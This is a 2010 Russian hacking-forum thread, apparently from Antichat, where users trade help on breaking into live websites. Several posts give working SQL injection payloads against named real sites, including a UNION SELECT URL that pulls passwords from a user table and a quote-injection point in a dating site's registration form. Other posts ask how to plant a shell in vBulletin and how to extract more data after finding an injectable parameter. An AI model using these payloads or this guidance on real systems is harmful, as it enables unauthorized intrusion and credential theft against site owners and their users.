13.07.2010, 17:53
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Код:
http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21+from+user
Какие идеи? |
|
|
13.07.2010, 17:57
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Seravin
Код:
http://www.wischamberfoundation.org/wcs/display.cfm?id=314+and+1=2+union+select+top+1+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21+from+user
Какие идеи? почитай статью sql инъекция в ms access
таблица user зарезервирована ты не можешь сделать запрос к этой таблице
|
|
|
|
13.07.2010, 19:06
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Есть вроде как уязвимость в Явовом сайте в пост параметре terms
Работает как через http так и через https
Сообщение от None
http://www.parship.de/profile/registration
forceDuplicatedEmail=false&mysex=1&essex=1&email=s ample%40email%2Etst&password=test&passwordCheck=1& terms=%2527
Но так как я с явой не имел дело, не имею понятия как с ним обращаться, может кто подскажет? |
|
|
|
13.07.2010, 22:33
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от R0nin
Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.
Прочитал, и не понял где моя ошибка.
Давай настроим файл hosts для локального сервера. По дефолту там прописано:
127.0.0.1 localhost
Заменим слово "localhost" на "local.net"
127.0.0.1 local.net
Набираем в браузере http://local.net
Браузер выводит:
Error!
Could not locate remote server
Что можете предложить, чтобы локальный сервер заработал по этому адресу?
|
|
|
|
13.07.2010, 22:35
|
|
Участник форума
Регистрация: 27.05.2009
Сообщений: 115
Провел на форуме:
2312554
Репутация:
97
|
|
Есть ли способы залить шелл в (vBulletin 3.8.4) через админку администратора (не глав. администратора) ?
Если кто знает, дайте пожалуйста ссылку на видео или статью, спасибо.
|
|
|
|
13.07.2010, 22:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от FlaktW
Прочитал, и не понял где моя ошибка.
www.google.ru 1111.2222.3333.4444
где ты видел такие IP адреса?
|
|
|
|
13.07.2010, 23:10
|
|
Новичок
Регистрация: 22.08.2009
Сообщений: 7
Провел на форуме:
23465
Репутация:
1
|
|
Помогите с SQL-Inj, пожалуйста.
Подобрал кол-во столбцов, запросом
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Узнал данные о сервере
PHP Version 5.2.10
System FreeBSD fe61.hc.ru 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #2: Thu Apr 12 13:46:06 MSD 2007 root@fe25.hw.ru:/usr/obj/usr/src/sys/XEON i386
Mysql Client API version 4.1.22
Apache/1.3.34 (Unix)
Нашел багу:
site.ru/index.php?id=1'
Выдаёт
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in ****
Что еще можно вытянуть? и как? Подскажите, плз
|
|
|
|
13.07.2010, 23:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
смотрю что то очень страшные вопросы пошли =\
2Anexroid найти принтабельное поле и ..... прочитать это /thread43966.html и что то сделать своим умом ...
2f137ch линк в ПМ помогу с раскруткой а то тут телепаты в отпуске ...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
13.07.2010, 23:34
|
|
Новичок
Регистрация: 22.08.2009
Сообщений: 7
Провел на форуме:
23465
Репутация:
1
|
|
Спс, нашел поле `email` только. =( Но за линк спс.
|
|
|
|
13.07.2010, 23:41
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
2shell_c0de
с aspx тяжеловато будет...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
